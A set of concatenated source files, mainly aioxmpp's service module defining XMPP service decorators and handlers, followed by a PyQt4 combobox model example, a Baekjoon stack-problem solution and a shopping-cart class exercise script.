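note::\n\n A hedged sketch of the relationship (``FooService`` and ``BarService``\n are hypothetical)::\n\n class FooService(aioxmpp.service.Service):\n pass\n\n class BarService(aioxmpp.service.Service):\n ORDER_AFTER = [FooService]\n\n assert BarService.orders_after(FooService)\n assert not FooService.orders_after(BarService)\n\n .. 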
versionadded:: 0.11\n \"\"\"\n return self.orders_after_any(frozenset([other]), visited=visited)\n\n def orders_after_any(self, other, *, visited=None):\n \"\"\"\n Return whether `self` orders after any of the services in the set\n `other`.\n\n :param other: Another service.\n :type other: A :class:`set` of\n :class:`aioxmpp.service.Service` instances\n\n .. versionadded:: 0.11\n \"\"\"\n if not other:\n return False\n if visited is None:\n visited = set()\n elif self in visited:\n return False\n visited.add(self)\n for item in self.PATCHED_ORDER_AFTER:\n if item in visited:\n continue\n if item in other:\n return True\n if item.orders_after_any(other, visited=visited):\n return True\n return False\n\n def independent_from(self, other):\n \"\"\"\n Return whether the services are independent (neither depends on\n the other).\n\n :param other: Another service.\n :type other: :class:`aioxmpp.service.Service`\n\n .. versionadded:: 0.11\n \"\"\"\n if self is other:\n return False\n return not self.orders_after(other) and not other.orders_after(self)\n\n\nclass Service(metaclass=Meta):\n \"\"\"\n A :class:`Service` is used to implement XMPP or XEP protocol parts, on top\n of the more or less fixed stanza handling implemented in\n :mod:`aioxmpp.node` and :mod:`aioxmpp.stream`.\n\n :class:`Service` is a base class which can be used by extension developers\n to implement support for custom or standardized protocol extensions. Some\n of the features for which :mod:`aioxmpp` has support are also implemented\n using :class:`Service` subclasses.\n\n `client` must be a :class:`~.Client` to which the service will be attached.\n The `client` cannot be changed later, for the sake of simplicity.\n\n `logger_base` may be a :class:`logging.Logger` instance or :data:`None`. If\n it is :data:`None`, a logger is automatically created, by taking the fully\n qualified name of the :class:`Service` subclass which is being\n instantiated. Otherwise, the logger is passed to :meth:`derive_logger` and\n the result is used as value for the :attr:`logger` attribute.\n\n To implement your own service, derive from :class:`Service`. If your\n service depends on other services (such as :mod:`aioxmpp.pubsub` or\n :mod:`aioxmpp.disco`), these dependencies *must* be declared as documented\n in the service meta class :class:`Meta`.\n\n To stay forward compatible, accept arbitrary keyword arguments and pass\n them down to :class:`Service`. As it is not possible to directly pass\n arguments to :class:`Service`\\\\ s on construction (due to the way\n :meth:`aioxmpp.Client.summon` works), there is no need for you\n to introduce custom arguments, and thus there should be no conflicts.\n\n .. note::\n\n Inheritance from classes which subclass :class:`Service` is forbidden.\n\n .. versionchanged:: 0.9\n\n .. autoattribute:: client\n\n .. autoattribute:: dependencies\n\n .. autoattribute:: service_order_index\n\n .. automethod:: derive_logger\n\n .. 
automethod:: shutdown\n \"\"\"\n\n def __init__(self, client, *, logger_base=None, dependencies={},\n service_order_index=0):\n if logger_base is None:\n self.logger = logging.getLogger(\".\".join([\n type(self).__module__, type(self).__qualname__\n ]))\n else:\n self.logger = self.derive_logger(logger_base)\n\n super().__init__()\n self.__context = contextlib.ExitStack()\n self.__client = client\n self.__dependencies = dependencies\n self.__service_order_index = service_order_index\n\n for item in self.SERVICE_HANDLERS:\n if isinstance(item, Descriptor):\n item.add_to_stack(self, self.__context)\n else:\n (handler_cm, additional_args), obj, kwargs = item\n self.__context.enter_context(\n handler_cm(\n self,\n self.__client.stream,\n obj.__get__(self, type(self)),\n *additional_args,\n **kwargs\n )\n )\n\n @property\n def service_order_index(self):\n \"\"\"\n Return the index of this service in the toposort of summoned\n services. This is primarily used to order filter chain\n registrations consistently with the dependency relationship of\n the services.\n\n .. versionadded:: 0.11\n \"\"\"\n return self.__service_order_index\n\n def derive_logger(self, logger):\n \"\"\"\n Return a child of `logger` specific for this instance. This is called\n after :attr:`client` has been set, from the constructor.\n\n The child name is calculated by the default implementation in a way\n specific to aioxmpp services; it is not meant to be used by\n non-:mod:`aioxmpp` classes; do not rely on the way the child name is\n calculated.\n \"\"\"\n parts = type(self).__module__.split(\".\")[1:]\n if parts[-1] == \"service\" and len(parts) > 1:\n del parts[-1]\n\n return logger.getChild(\".\".join(\n parts+[type(self).__qualname__]\n ))\n\n @property\n def client(self):\n \"\"\"\n The client to which the :class:`Service` is bound. This attribute is\n read-only.\n\n If the service has been shut down using :meth:`shutdown`, this reads as\n :data:`None`.\n \"\"\"\n return self.__client\n\n @property\n def dependencies(self):\n \"\"\"\n When the service is instantiated through\n :meth:`~.Client.summon`, this attribute holds a mapping which maps the\n service classes contained in the :attr:`~.Meta.ORDER_AFTER` attribute\n to the respective instances related to the :attr:`client`.\n\n This is the preferred way to obtain dependencies specified via\n :attr:`~.Meta.ORDER_AFTER`.\n \"\"\"\n return self.__dependencies\n\n async def _shutdown(self):\n \"\"\"\n Actual implementation of the shut down process.\n\n This *must* be called using super from inheriting classes after their\n own shutdown procedure. Inheriting classes *must* override this method\n instead of :meth:`shutdown`.\n \"\"\"\n\n async def shutdown(self):\n \"\"\"\n Close the service and wait for it to completely shut down.\n\n Some services which are still running may depend on this service. In\n that case, the service may refuse to shut down by raising a\n :class:`RuntimeError` exception.\n\n .. note::\n\n Developers creating subclasses of :class:`Service` to implement\n services should not override this method. 
Instead, they should\n override the :meth:`_shutdown` method.\n\n \"\"\"\n await self._shutdown()\n self.__context.close()\n self.__client = None\n\n\nclass HandlerSpec(collections.namedtuple(\n \"HandlerSpec\",\n [\n \"is_unique\",\n \"key\",\n \"require_deps\",\n ])):\n \"\"\"\n Specification of the effects of the decorator at initialisation and shutdown\n time.\n\n :param key: Context manager factory and arguments pair.\n :type key: pair\n :param is_unique: Whether multiple identical `key` values are allowed on a\n single class.\n :type is_unique: :class:`bool`\n :param require_deps: Dependent services which are required for the\n decorator to work.\n :type require_deps: iterable of :class:`Service` classes\n\n During initialisation of the :class:`Service` which has a method using a\n given handler spec, the first part of the `key` pair is called with the\n service instance as first, the client :class:`StanzaStream` as second and\n the bound method as third argument. The second part of the `key` is\n unpacked as additional positional arguments.\n\n The result of the call must be a context manager, which is immediately\n entered. On shutdown, the context manager is exited.\n\n An example use would be the following handler spec::\n\n HandlerSpec(\n (func, (IQType.GET, some_payload_class)),\n is_unique=True,\n )\n\n where ``func`` is a context manager factory which takes a service instance, a\n stanza stream and a bound method, as well as an IQ type and a payload class. On\n enter, the context manager would register the method it received as third\n argument on the stanza stream (second argument) as handler for the given IQ\n type and payload class (fourth and fifth arguments).\n\n If `is_unique` is true and several methods have :class:`HandlerSpec`\n objects with the same `key`, :class:`TypeError` is raised at class\n definition time.\n\n If at class definition time any of the dependent classes in `require_deps`\n are not declared using the order attributes (see :class:`Meta`), a\n :class:`TypeError` is raised.\n\n There is a property to extract the function directly:\n\n .. autoattribute:: func\n \"\"\"\n\n def __new__(cls, key, is_unique=True, require_deps=()):\n return super().__new__(cls, is_unique, key, frozenset(require_deps))\n\n @property\n def func(self):\n \"\"\"\n The factory of the context manager for this handler.\n\n .. versionadded:: 0.11\n \"\"\"\n return self.key[0]\n\n\ndef add_handler_spec(f, handler_spec, *, kwargs=None):\n \"\"\"\n Attach a handler specification (see :class:`HandlerSpec`) to a function.\n\n :param f: Function to attach the handler specification to.\n :param handler_spec: Handler specification to attach to the function.\n :type handler_spec: :class:`HandlerSpec`\n :param kwargs: additional keyword arguments passed to the function\n carried in the handler spec.\n :type kwargs: :class:`dict`\n\n :raises ValueError: if the handler was registered with\n different `kwargs` before\n\n This uses a private attribute, whose exact name is an implementation\n detail. The `handler_spec` is stored in a :class:`dict` bound to the\n attribute.\n\n .. versionadded:: 0.11\n\n The `kwargs` argument. If two handlers with the same spec but\n different arguments are registered for one function, an error\n will be raised. 
So you should always include all possible\n arguments; this is the responsibility of the calling decorator.\n \"\"\"\n handler_dict = automake_magic_attr(f)\n if kwargs is None:\n kwargs = {}\n if kwargs != handler_dict.setdefault(handler_spec, kwargs):\n raise ValueError(\n \"The additional keyword arguments to the handler are incompatible\")\n\n\ndef _apply_iq_handler(instance, stream, func, type_, payload_cls, *,\n with_send_reply=False):\n return aioxmpp.stream.iq_handler(stream, type_, payload_cls, func,\n with_send_reply=with_send_reply)\n\n\ndef _apply_presence_handler(instance, stream, func, type_, from_):\n return aioxmpp.stream.presence_handler(stream, type_, from_, func)\n\n\ndef _apply_inbound_message_filter(instance, stream, func):\n return aioxmpp.stream.stanza_filter(\n stream.service_inbound_message_filter,\n func,\n instance.service_order_index,\n )\n\n\ndef _apply_inbound_presence_filter(instance, stream, func):\n return aioxmpp.stream.stanza_filter(\n stream.service_inbound_presence_filter,\n func,\n instance.service_order_index,\n )\n\n\ndef _apply_outbound_message_filter(instance, stream, func):\n return aioxmpp.stream.stanza_filter(\n stream.service_outbound_message_filter,\n func,\n instance.service_order_index,\n )\n\n\ndef _apply_outbound_presence_filter(instance, stream, func):\n return aioxmpp.stream.stanza_filter(\n stream.service_outbound_presence_filter,\n func,\n instance.service_order_index,\n )\n\n\ndef _apply_connect_depsignal(instance, stream, func, dependency, signal_name,\n mode):\n if dependency is aioxmpp.stream.StanzaStream:\n dependency = instance.client.stream\n elif dependency is aioxmpp.node.Client:\n dependency = instance.client\n else:\n dependency = instance.dependencies[dependency]\n signal = getattr(dependency, signal_name)\n if mode is None:\n return signal.context_connect(func)\n else:\n try:\n mode_func, args = mode\n except TypeError:\n pass\n else:\n mode = mode_func(*args)\n return signal.context_connect(func, mode)\n\n\ndef _apply_connect_depfilter(instance, stream, func, dependency, filter_name):\n if dependency is aioxmpp.stream.StanzaStream:\n dependency = instance.client.stream\n else:\n dependency = instance.dependencies[dependency]\n filter_ = getattr(dependency, filter_name)\n return filter_.context_register(func, instance.service_order_index)\n\n\ndef _apply_connect_attrsignal(instance, stream, func, descriptor, signal_name,\n mode):\n obj = descriptor.__get__(instance, type(instance))\n signal = getattr(obj, signal_name)\n if mode is None:\n return signal.context_connect(func)\n else:\n try:\n mode_func, args = mode\n except TypeError:\n pass\n else:\n mode = mode_func(*args)\n return signal.context_connect(func, mode)\n\n\ndef iq_handler(type_, payload_cls, *, with_send_reply=False):\n \"\"\"\n Register the decorated function or coroutine function as IQ request\n handler.\n\n :param type_: IQ type to listen for\n :type type_: :class:`~.IQType`\n :param payload_cls: Payload XSO class to listen for\n :type payload_cls: :class:`~.XSO` subclass\n :param with_send_reply: Whether to pass a function which sends the reply\n to the decorated callable as second argument.\n :type with_send_reply: :class:`bool`\n\n :raises ValueError: if `payload_cls` is not a registered IQ payload\n\n If the decorated function is not a coroutine function, it must return an\n awaitable instead.\n\n .. 
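note::\n\n A hedged usage sketch; ``Query`` stands for any XSO which has been\n registered as IQ payload via :meth:`aioxmpp.IQ.as_payload_class`::\n\n class EchoService(aioxmpp.service.Service):\n @aioxmpp.service.iq_handler(aioxmpp.IQType.GET, Query)\n async def handle_query(self, iq):\n # the return value is used as the reply payload\n return iq.payload\n\n .. 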
seealso::\n\n :meth:`~.StanzaStream.register_iq_request_handler` for more\n details on the `type_`, `payload_cls` and\n `with_send_reply` arguments, as well as behaviour expected\n from the decorated function.\n\n :meth:`aioxmpp.IQ.as_payload_class`\n for a way to register a XSO as IQ payload\n\n .. versionadded:: 0.11\n\n The `with_send_reply` argument.\n\n .. versionchanged:: 0.10\n\n The decorator now checks if `payload_cls` is a valid, registered IQ\n payload and raises :class:`ValueError` if not.\n \"\"\"\n\n if (not hasattr(payload_cls, \"TAG\") or\n (aioxmpp.IQ.CHILD_MAP.get(payload_cls.TAG) is not\n aioxmpp.IQ.payload.xq_descriptor) or\n payload_cls not in aioxmpp.IQ.payload._classes):\n raise ValueError(\n \"{!r} is not a valid IQ payload \"\n \"(use IQ.as_payload_class decorator)\".format(\n payload_cls,\n )\n )\n\n def decorator(f):\n add_handler_spec(\n f,\n HandlerSpec(\n (_apply_iq_handler, (type_, payload_cls)),\n require_deps=(),\n ),\n kwargs=dict(with_send_reply=with_send_reply),\n )\n return f\n return decorator\n\n\ndef message_handler(type_, from_):\n \"\"\"\n Deprecated alias of :func:`.dispatcher.message_handler`.\n\n .. deprecated:: 0.9\n \"\"\"\n import aioxmpp.dispatcher\n return aioxmpp.dispatcher.message_handler(type_, from_)\n\n\ndef presence_handler(type_, from_):\n \"\"\"\n Deprecated alias of :func:`.dispatcher.presence_handler`.\n\n .. deprecated:: 0.9\n \"\"\"\n import aioxmpp.dispatcher\n return aioxmpp.dispatcher.presence_handler(type_, from_)\n\n\ndef inbound_message_filter(f):\n \"\"\"\n Register the decorated function as a service-level inbound message filter.\n\n :raise TypeError: if the decorated object is a coroutine function\n\n .. seealso::\n\n :class:`StanzaStream`\n for important remarks regarding the use of stanza filters.\n\n \"\"\"\n\n if asyncio.iscoroutinefunction(f):\n raise TypeError(\n \"inbound_message_filter must not be a coroutine function\"\n )\n\n add_handler_spec(\n f,\n HandlerSpec(\n (_apply_inbound_message_filter, ())\n ),\n )\n return f\n\n\ndef inbound_presence_filter(f):\n \"\"\"\n Register the decorated function as a service-level inbound presence filter.\n\n :raise TypeError: if the decorated object is a coroutine function\n\n .. seealso::\n\n :class:`StanzaStream`\n for important remarks regarding the use of stanza filters.\n\n \"\"\"\n\n if asyncio.iscoroutinefunction(f):\n raise TypeError(\n \"inbound_presence_filter must not be a coroutine function\"\n )\n\n add_handler_spec(\n f,\n HandlerSpec(\n (_apply_inbound_presence_filter, ())\n ),\n )\n return f\n\n\ndef outbound_message_filter(f):\n \"\"\"\n Register the decorated function as a service-level outbound message filter.\n\n :raise TypeError: if the decorated object is a coroutine function\n\n .. seealso::\n\n :class:`StanzaStream`\n for important remarks regarding the use of stanza filters.\n\n \"\"\"\n\n if asyncio.iscoroutinefunction(f):\n raise TypeError(\n \"outbound_message_filter must not be a coroutine function\"\n )\n\n add_handler_spec(\n f,\n HandlerSpec(\n (_apply_outbound_message_filter, ())\n ),\n )\n return f\n\n\ndef outbound_presence_filter(f):\n \"\"\"\n Register the decorated function as a service-level outbound presence\n filter.\n\n :raise TypeError: if the decorated object is a coroutine function\n\n .. 
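note::\n\n A minimal sketch, assuming the usual stanza filter contract (return\n the possibly modified stanza, or :data:`None` to drop it)::\n\n class DropService(aioxmpp.service.Service):\n @aioxmpp.service.inbound_message_filter\n def filter_inbound_message(self, stanza):\n # hypothetical condition; everything else is dropped\n if stanza.body:\n return stanza\n return None\n\n .. 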
seealso::\n\n :class:`StanzaStream`\n for important remarks regarding the use of stanza filters.\n\n \"\"\"\n\n if asyncio.iscoroutinefunction(f):\n raise TypeError(\n \"outbound_presence_filter must not be a coroutine function\"\n )\n\n add_handler_spec(\n f,\n HandlerSpec(\n (_apply_outbound_presence_filter, ())\n ),\n )\n return f\n\n\ndef _signal_connect_mode(signal, f, defer):\n if isinstance(signal, aioxmpp.callbacks.SyncSignal):\n if not asyncio.iscoroutinefunction(f):\n raise TypeError(\n \"a coroutine function is required for this signal\"\n )\n if defer:\n raise ValueError(\n \"cannot use defer with this signal\"\n )\n mode = None\n else:\n if asyncio.iscoroutinefunction(f):\n if defer:\n mode = aioxmpp.callbacks.AdHocSignal.SPAWN_WITH_LOOP, (None,)\n else:\n raise TypeError(\n \"cannot use coroutine function with this signal\"\n \" without defer\"\n )\n elif defer:\n mode = aioxmpp.callbacks.AdHocSignal.ASYNC_WITH_LOOP, (None,)\n else:\n mode = aioxmpp.callbacks.AdHocSignal.STRONG\n\n return mode\n\n\ndef _depsignal_spec(class_, signal_name, f, defer):\n signal = getattr(class_, signal_name)\n\n mode = _signal_connect_mode(signal, f, defer)\n\n if (class_ is not aioxmpp.stream.StanzaStream and\n class_ is not aioxmpp.node.Client):\n deps = (class_,)\n else:\n deps = ()\n\n return HandlerSpec(\n (\n _apply_connect_depsignal,\n (\n class_,\n signal_name,\n mode,\n )\n ),\n require_deps=deps,\n )\n\n\ndef depsignal(class_, signal_name, *, defer=False):\n \"\"\"\n Connect the decorated method or coroutine method to the addressed signal on\n a class on which the service depends.\n\n :param class_: A service class which is listed in the\n :attr:`~.Meta.ORDER_AFTER` relationship.\n :type class_: :class:`Service` class or one of the special cases below\n :param signal_name: Attribute name of the signal to connect to\n :type signal_name: :class:`str`\n :param defer: Flag indicating whether deferred execution of the decorated\n method is desired; see below for details.\n :type defer: :class:`bool`\n\n The signal is discovered by accessing the attribute with the name\n `signal_name` on the given `class_`. In addition, the following arguments\n are supported for `class_`:\n\n 1. :class:`aioxmpp.stream.StanzaStream`: the corresponding signal of the\n stream of the client running the service is used.\n\n 2. :class:`aioxmpp.Client`: the corresponding signal of the client running\n the service is used.\n\n If the signal is a :class:`.callbacks.Signal` and `defer` is false, the\n decorated object is connected using the default\n :attr:`~.callbacks.AdHocSignal.STRONG` mode.\n\n If the signal is a :class:`.callbacks.Signal` and `defer` is true and the\n decorated object is a coroutine function, the\n :attr:`~.callbacks.AdHocSignal.SPAWN_WITH_LOOP` mode with the default\n asyncio event loop is used. If the decorated object is not a coroutine\n function, :attr:`~.callbacks.AdHocSignal.ASYNC_WITH_LOOP` is used instead.\n\n If the signal is a :class:`.callbacks.SyncSignal`, `defer` must be false\n and the decorated object must be a coroutine function.\n\n .. 
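note::\n\n A hedged sketch connecting to a stream signal (one of the special\n cases, so no dependency declaration is needed; the handler signature\n depends on the concrete signal)::\n\n class WatcherService(aioxmpp.service.Service):\n @aioxmpp.service.depsignal(\n aioxmpp.stream.StanzaStream,\n \"on_stream_destroyed\")\n def handle_stream_destroyed(self, *args):\n self.logger.info(\"stream destroyed\")\n\n .. 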
versionchanged:: 0.9\n\n Support for :class:`aioxmpp.stream.StanzaStream` and\n :class:`aioxmpp.Client` as `class_` argument was added.\n \"\"\"\n\n def decorator(f):\n add_handler_spec(\n f,\n _depsignal_spec(class_, signal_name, f, defer)\n )\n return f\n return decorator\n\n\ndef _attrsignal_spec(descriptor, signal_name, f, defer):\n signal = getattr(descriptor.value_type, signal_name)\n mode = _signal_connect_mode(signal, f, defer)\n\n return HandlerSpec(\n (\n _apply_connect_attrsignal,\n (\n descriptor,\n signal_name,\n mode\n )\n ),\n is_unique=True,\n require_deps=(),\n )\n\n\ndef attrsignal(descriptor, signal_name, *, defer=False):\n \"\"\"\n Connect the decorated method or coroutine method to the addressed signal on\n a descriptor.\n\n :param descriptor: The descriptor to connect to.\n :type descriptor: :class:`Descriptor` subclass.\n :param signal_name: Attribute name of the signal to connect to\n :type signal_name: :class:`str`\n :param defer: Flag indicating whether deferred execution of the decorated\n method is desired; see below for details.\n :type defer: :class:`bool`\n\n The signal is discovered by accessing the attribute with the name\n `signal_name` on the :attr:`~Descriptor.value_type` of the `descriptor`.\n\n During instantiation of the service, the value of the descriptor is used\n to obtain the signal and then the decorated method is connected to the\n signal.\n\n If the signal is a :class:`.callbacks.Signal` and `defer` is false, the\n decorated object is connected using the default\n :attr:`~.callbacks.AdHocSignal.STRONG` mode.\n\n If the signal is a :class:`.callbacks.Signal` and `defer` is true and the\n decorated object is a coroutine function, the\n :attr:`~.callbacks.AdHocSignal.SPAWN_WITH_LOOP` mode with the default\n asyncio event loop is used. If the decorated object is not a coroutine\n function, :attr:`~.callbacks.AdHocSignal.ASYNC_WITH_LOOP` is used instead.\n\n If the signal is a :class:`.callbacks.SyncSignal`, `defer` must be false\n and the decorated object must be a coroutine function.\n\n .. versionadded:: 0.9\n \"\"\"\n def decorator(f):\n add_handler_spec(\n f,\n _attrsignal_spec(descriptor, signal_name, f, defer)\n )\n return f\n return decorator\n\n\ndef _depfilter_spec(class_, filter_name):\n require_deps = ()\n if class_ is not aioxmpp.stream.StanzaStream:\n require_deps = (class_,)\n\n return HandlerSpec(\n (\n _apply_connect_depfilter,\n (\n class_,\n filter_name,\n )\n ),\n is_unique=True,\n require_deps=require_deps,\n )\n\n\ndef depfilter(class_, filter_name):\n \"\"\"\n Register the decorated method at the addressed :class:`~.callbacks.Filter`\n on a class on which the service depends.\n\n :param class_: A service class which is listed in the\n :attr:`~.Meta.ORDER_AFTER` relationship.\n :type class_: :class:`Service` class or\n :class:`aioxmpp.stream.StanzaStream`\n :param filter_name: Attribute name of the filter to register at\n :type filter_name: :class:`str`\n\n The filter at which the decorated method is registered is discovered by\n accessing the attribute with the name `filter_name` on the instance of the\n dependent class `class_`. If `class_` is\n :class:`aioxmpp.stream.StanzaStream`, the filter is searched for on the\n stream (and no dependency needs to be declared).\n\n .. 
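note::\n\n A hedged sketch registering at one of the service-level filter chains\n of the stream::\n\n class StampService(aioxmpp.service.Service):\n @aioxmpp.service.depfilter(\n aioxmpp.stream.StanzaStream,\n \"service_outbound_presence_filter\")\n def stamp_presence(self, stanza):\n # return the (possibly modified) stanza to keep it\n return stanza\n\n .. 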
versionadded:: 0.9\n \"\"\"\n spec = _depfilter_spec(class_, filter_name)\n\n def decorator(f):\n add_handler_spec(\n f,\n spec,\n )\n return f\n\n return decorator\n\n\ndef is_iq_handler(type_, payload_cls, coro, *, with_send_reply=False):\n \"\"\"\n Return true if `coro` has been decorated with :func:`iq_handler` for the\n given `type_` and `payload_cls` and the specified keyword arguments.\n \"\"\"\n\n try:\n handlers = get_magic_attr(coro)\n except AttributeError:\n return False\n\n hs = HandlerSpec(\n (_apply_iq_handler, (type_, payload_cls)),\n )\n\n try:\n return handlers[hs] == dict(with_send_reply=with_send_reply)\n except KeyError:\n return False\n\n\ndef is_message_handler(type_, from_, cb):\n \"\"\"\n Deprecated alias of :func:`.dispatcher.is_message_handler`.\n\n .. deprecated:: 0.9\n \"\"\"\n import aioxmpp.dispatcher\n return aioxmpp.dispatcher.is_message_handler(type_, from_, cb)\n\n\ndef is_presence_handler(type_, from_, cb):\n \"\"\"\n Deprecated alias of :func:`.dispatcher.is_presence_handler`.\n\n .. deprecated:: 0.9\n \"\"\"\n import aioxmpp.dispatcher\n return aioxmpp.dispatcher.is_presence_handler(type_, from_, cb)\n\n\ndef is_inbound_message_filter(cb):\n \"\"\"\n Return true if `cb` has been decorated with :func:`inbound_message_filter`.\n \"\"\"\n\n try:\n handlers = get_magic_attr(cb)\n except AttributeError:\n return False\n\n hs = HandlerSpec(\n (_apply_inbound_message_filter, ())\n )\n\n return hs in handlers\n\n\ndef is_inbound_presence_filter(cb):\n \"\"\"\n Return true if `cb` has been decorated with\n :func:`inbound_presence_filter`.\n \"\"\"\n\n try:\n handlers = get_magic_attr(cb)\n except AttributeError:\n return False\n\n hs = HandlerSpec(\n (_apply_inbound_presence_filter, ())\n )\n\n return hs in handlers\n\n\ndef is_outbound_message_filter(cb):\n \"\"\"\n Return true if `cb` has been decorated with\n :func:`outbound_message_filter`.\n \"\"\"\n\n try:\n handlers = get_magic_attr(cb)\n except AttributeError:\n return False\n\n hs = HandlerSpec(\n (_apply_outbound_message_filter, ())\n )\n\n return hs in handlers\n\n\ndef is_outbound_presence_filter(cb):\n \"\"\"\n Return true if `cb` has been decorated with\n :func:`outbound_presence_filter`.\n \"\"\"\n\n try:\n handlers = get_magic_attr(cb)\n except AttributeError:\n return False\n\n hs = HandlerSpec(\n (_apply_outbound_presence_filter, ())\n )\n\n return hs in handlers\n\n\ndef is_depsignal_handler(class_, signal_name, cb, *, defer=False):\n \"\"\"\n Return true if `cb` has been decorated with :func:`depsignal` for the given\n signal, class and connection mode.\n \"\"\"\n try:\n handlers = get_magic_attr(cb)\n except AttributeError:\n return False\n\n return _depsignal_spec(class_, signal_name, cb, defer) in handlers\n\n\ndef is_depfilter_handler(class_, filter_name, filter_):\n \"\"\"\n Return true if `filter_` has been decorated with :func:`depfilter` for the\n given filter and class.\n \"\"\"\n try:\n handlers = get_magic_attr(filter_)\n except AttributeError:\n return False\n\n return _depfilter_spec(class_, filter_name) in handlers\n\n\ndef is_attrsignal_handler(descriptor, signal_name, cb, *, defer=False):\n \"\"\"\n Return true if `cb` has been decorated with :func:`attrsignal` for the\n given signal, descriptor and connection mode.\n \"\"\"\n try:\n handlers = get_magic_attr(cb)\n except AttributeError:\n return False\n\n return _attrsignal_spec(descriptor, signal_name, cb, defer) in 
handlers\n","repo_name":"horazont/aioxmpp","sub_path":"aioxmpp/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":49185,"program_lang":"python","lang":"en","doc_type":"code","stars":215,"dataset":"github-code","pt":"21"} +{"seq_id":"74865928053","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom PyQt4 import QtCore, QtGui\n\n\nclass Model(QtCore.QAbstractListModel):\n def __init__(self, *args, **kwargs):\n QtCore.QAbstractListModel.__init__(self, *args, **kwargs)\n self.items = []\n\n def rowCount(self, parent=QtCore.QModelIndex()):\n return len(self.items)\n\n def data(self, index, role=QtCore.Qt.DisplayRole):\n if index.isValid() is True:\n if role == QtCore.Qt.DisplayRole:\n return QtCore.QVariant(self.items[index.row()])\n elif role == QtCore.Qt.ItemDataRole:\n return QtCore.QVariant(self.items[index.row()])\n return QtCore.QVariant()\n\n def itemsAdded(self, items):\n # insert items into their sorted position\n items = sorted(items)\n row = 0\n while row < len(self.items) and len(items) > 0:\n if items[0] < self.items[row]:\n self.beginInsertRows(QtCore.QModelIndex(), row, row)\n self.items.insert(row, items.pop(0))\n self.endInsertRows()\n row += 1\n row += 1\n # add remaining items to end of the list\n if len(items) > 0:\n self.beginInsertRows(\n QtCore.QModelIndex(),\n len(self.items),\n len(self.items) + len(items) - 1\n )\n self.items.extend(items)\n self.endInsertRows()\n\n def itemsRemoved(self, items):\n # remove items from the list\n for item in items:\n for row in range(0, len(self.items)):\n if self.items[row] == item:\n self.beginRemoveRows(QtCore.QModelIndex(), row, row)\n self.items.pop(row)\n self.endRemoveRows()\n break\n\n\ndef main():\n app = QtGui.QApplication([])\n w = QtGui.QWidget()\n w.resize(300, 200)\n layout = QtGui.QVBoxLayout()\n\n model = Model()\n model.itemsAdded(['a', 'b', 'd', 'e'])\n\n combobox = QtGui.QComboBox()\n combobox.setModel(model)\n combobox.setCurrentIndex(3)\n layout.addWidget(combobox)\n\n def insertC(self):\n model.itemsAdded('c')\n\n def removeC(self):\n model.itemsRemoved('c')\n\n buttonInsert = QtGui.QPushButton('Insert \"c\"')\n buttonInsert.clicked.connect(insertC)\n layout.addWidget(buttonInsert)\n\n buttonRemove = QtGui.QPushButton('Remove \"c\"')\n buttonRemove.clicked.connect(removeC)\n layout.addWidget(buttonRemove)\n\n w.setLayout(layout)\n w.show()\n app.exec_()\n\nif __name__ == '__main__':\n main()\n","repo_name":"finger563/editor","sub_path":"tests/comboBox2.py","file_name":"comboBox2.py","file_ext":"py","file_size_in_byte":2585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37496537256","text":"#Baekjoon 2493\nimport sys\ninput = sys.stdin.readline\n\nn = int(input())\ntowers = list(map(int, input().split()))\nstack = []\nanswer = []\nfor i in range(n):\n if len(stack) == 0:\n stack.append([towers[i], i])\n answer.append(0)\n else:\n while stack:\n if stack[-1][0] < towers[i]:\n stack.pop()\n if len(stack) == 0:\n answer.append(0)\n else:\n answer.append(stack[-1][1]+1)\n break\n stack.append([towers[i], i]) \nfor num in answer:\n print(num, end=\" \")","repo_name":"meoldae/Algorithm","sub_path":"Boj/Python/탑.py","file_name":"탑.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34759645176","text":"# your imports may be different!\nfrom classes import Book, CoffeeMachine, SoccerBall, Candle, Amazon\n\namazon = 
Amazon()\njohn_id = amazon.create_account(\"John\")\n\ncandle_1 = Candle()\nprint(f\"Price of a candle is {candle_1.price}\")\nprint(\"\")\n\namazon.customers[john_id].deposit(candle_1.price)\ntry:\n amazon.buy_item(john_id, candle_1) # should throw a ValueError because item not in cart\nexcept ValueError:\n amazon.add_to_cart(john_id, candle_1)\n amazon.buy_item(john_id, candle_1)\n\nprint(\"*****************Part 1*****************\")\nprint(\"After buying 1 candle:\")\nprint(amazon.customers[john_id])\n\nprint(\"\")\nprint(\"*****************Part 2*****************\")\nsarah_id = amazon.create_account(\"Sarah\")\nbook_1 = Book() # 15$\nbook_2 = Book() # 15$\ncoffee_1 = CoffeeMachine() # 100$\ncoffee_2 = CoffeeMachine() # 100$\nsoccer_ball_1 = SoccerBall() # 25$\n\ntotal_price = book_1.price + book_2.price + coffee_1.price + coffee_2.price + soccer_ball_1.price\n\namazon.add_to_cart(sarah_id, book_1)\namazon.add_to_cart(sarah_id, book_2)\namazon.add_to_cart(sarah_id, coffee_1)\namazon.add_to_cart(sarah_id, coffee_2)\namazon.add_to_cart(sarah_id, soccer_ball_1)\n\namazon.show_cart(sarah_id)\n\nprint(\"\")\nprint(\"*****************Part 3*****************\")\n\ntry:\n amazon.buy_entire_cart(sarah_id) # this should throw a ValueError because not enough funds\nexcept ValueError:\n amazon.customers[sarah_id].deposit(total_price)\n amazon.buy_entire_cart(sarah_id)\n\nprint(amazon.customers[sarah_id])\n\n# THE OUTPUT OF THE ABOVE PROGRAM IS:\n\n# Price of a candle is 5\n#\n# *****************Part 1*****************\n# After buying 1 candle:\n# Name: John, Balance: 0$, Money Spent: 5$\n#\n# *****************Part 2*****************\n# Total # of items: 5\n# Total # of books: 2\n# Total # of candles: 0\n# Total # of coffee machines: 2\n# Total # of soccer balls: 1\n# Cart contents:\n# Book: 15$ -- 9d47a17c9ed64b9ea41824462368764a\n# Book: 15$ -- 7795bdfd127c49e0a36b2ca8292a0542\n# Coffee Machine: 100$ -- b531649e06a14b36b96293a9cd897ed5\n# Coffee Machine: 100$ -- e5a87b09d1794148a8a96d7fd047e6e3\n# Soccer Ball: 25$ -- f8ade4d0f8244612a9a204463294ae42\n#\n# *****************Part 3*****************\n# Name: Sarah, Balance: 25.5$, Money Spent: 229.5$\n#\n# Process finished with exit code 